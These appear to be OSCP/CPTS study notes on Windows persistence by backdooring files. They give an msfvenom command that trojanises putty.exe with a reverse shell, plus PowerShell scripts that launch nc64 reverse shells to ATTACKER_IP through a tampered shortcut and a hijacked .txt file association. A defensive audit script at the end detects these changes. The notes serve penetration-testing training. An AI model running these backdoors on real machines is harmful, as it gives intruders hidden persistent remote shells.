OSCP-CPTS NOTES

Backdooring Files


Executable Files

If we find an executable that the user is likely to run frequently, we can download it to our attacking machine and modify it so that it runs our payload in addition to its normal function.

For this we can use msfvenom.

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

The output puttyX.exe will execute the reverse TCP shell payload (windows/x64/shell_reverse_tcp) while still doing its actual job.

Shortcut Files

Instead of altering the executable itself, we can tamper with its shortcut (.lnk) file so that it executes the backdoor first and then launches the usual program.

In the Calculator shortcut, we can change the Target field to point to a malicious backdoor script. The script starts the backdoor and then launches the real calculator:

# start the nc64 reverse shell without waiting for it to finish
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4445"

# then run the real program so the user sees the expected behaviour
C:\Windows\System32\calc.exe

We save this script as C:\Windows\System32\backdoor.ps1 and then change the shortcut's Target field to:

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

Hijacking File Associations

We can hijack a file association to force the operating system to run a shell whenever the user opens a specific file type.

In Windows, file associations are kept in the registry under HKLM\Software\Classes.

For example, .txt is associated with the txtfile Programmatic ID (ProgID). A ProgID is simply an identifier for a program installed on the system.

We can then inspect the ProgID's subkey shell\open\command.

When we open a .txt file, the system executes %SystemRoot%\system32\NOTEPAD.EXE %1, where %1 represents the name of the opened file.

We can change this parameter to execute our backdoor script.

Let's create a backdoor.ps1 script and save it in C:\Windows:

# start the nc64 reverse shell without waiting for it to finish
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"

# then open the requested file in Notepad; $args[0] receives the %1 file name
C:\Windows\system32\NOTEPAD.EXE $args[0]

Then edit the registry value so that it runs this script instead of NOTEPAD.EXE:

Then, whenever a .txt file is opened, our backdoor gets triggered and gives us a shell.
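The following PowerShell script is an added defensive counterpart to the three techniques on this page (executable backdooring, shortcut tampering and file-association hijacking); it is not part of the original notes. It audits a host for the artefacts each technique leaves behind: an executable whose Authenticode signature is no longer valid (a template rebuilt with msfvenom -x/-k is no longer the vendor-signed binary), .lnk shortcuts whose target is a script host such as powershell.exe launched with arguments, and a txtfile shell\open\command that no longer points at NOTEPAD.EXE. The default executable path, shortcut directories and ProgID list are assumptions chosen for illustration; the expected NOTEPAD.EXE command is the one the notes describe. The shortcut rule is a heuristic, so its output is meant for analyst review rather than automatic action.

```powershell
# Added audit example (not part of the original notes). Run in an elevated
# PowerShell session; it only reads files and registry values.
param(
    # Assumed locations; adjust to the executables and shortcut folders you care about.
    [string[]]$ExecutablePaths = @("C:\Program Files\PuTTY\putty.exe"),
    [string[]]$ShortcutRoots   = @("$env:PUBLIC\Desktop",
                                   "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
                                   "$env:ProgramData\Microsoft\Windows\Start Menu\Programs"),
    [string[]]$ProgIds         = @("txtfile")
)

$findings = @()
# Script hosts that a tampered shortcut or association would typically launch.
$scriptHosts = 'powershell\.exe|pwsh\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe'

# --- 1. Executable backdooring: the rebuilt binary loses its valid signature ---
foreach ($exe in $ExecutablePaths) {
    if (-not (Test-Path -Path $exe)) { continue }
    $sig = Get-AuthenticodeSignature -FilePath $exe
    if ($sig.Status -ne 'Valid') {
        $findings += [pscustomobject]@{
            Check  = 'ExecutableSignature'
            Item   = $exe
            Detail = "Signature status: $($sig.Status)"
        }
    }
}

# --- 2. Shortcut tampering: .lnk whose target is a script host with arguments ---
$wsh = New-Object -ComObject WScript.Shell
foreach ($root in $ShortcutRoots) {
    if (-not (Test-Path -Path $root)) { continue }
    Get-ChildItem -Path $root -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        # CreateShortcut on an existing .lnk loads it for reading.
        $lnk = $wsh.CreateShortcut($_.FullName)
        $target = "$($lnk.TargetPath) $($lnk.Arguments)".Trim()
        # Example from the notes: powershell.exe -WindowStyle hidden C:\...\backdoor.ps1
        if ($lnk.TargetPath -match $scriptHosts -and $lnk.Arguments -ne '') {
            $findings += [pscustomobject]@{
                Check  = 'ShortcutTarget'
                Item   = $_.FullName
                Detail = $target
            }
        }
    }
}

# --- 3. File-association hijacking: shell\open\command no longer the expected handler ---
foreach ($progid in $ProgIds) {
    $key = "Registry::HKEY_LOCAL_MACHINE\Software\Classes\$progid\shell\open\command"
    if (-not (Test-Path -Path $key)) { continue }
    $cmd = (Get-ItemProperty -Path $key).'(default)'
    # The notes give the default as %SystemRoot%\system32\NOTEPAD.EXE %1;
    # flag anything else, or anything that routes through a script host.
    if ($cmd -notmatch 'NOTEPAD\.EXE' -or $cmd -match $scriptHosts) {
        $findings += [pscustomobject]@{
            Check  = 'FileAssociation'
            Item   = $key
            Detail = $cmd
        }
    }
}

if ($findings.Count -eq 0) {
    "No findings."
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

Each finding names the check that fired, the file or registry key involved, and the observed target or command, so the result can be compared against a known-good baseline of the same host. Extending $ProgIds to other document types (and the expected handler pattern with it) covers associations beyond .txt.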